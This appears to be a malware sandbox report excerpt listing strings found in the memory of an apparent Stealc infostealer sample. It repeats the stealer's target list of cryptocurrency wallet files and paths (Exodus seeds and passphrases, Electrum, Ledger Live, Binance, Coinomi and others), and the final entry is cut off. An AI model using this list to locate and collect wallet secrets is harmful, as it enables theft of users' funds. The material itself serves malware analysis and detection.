Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3112251700.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local 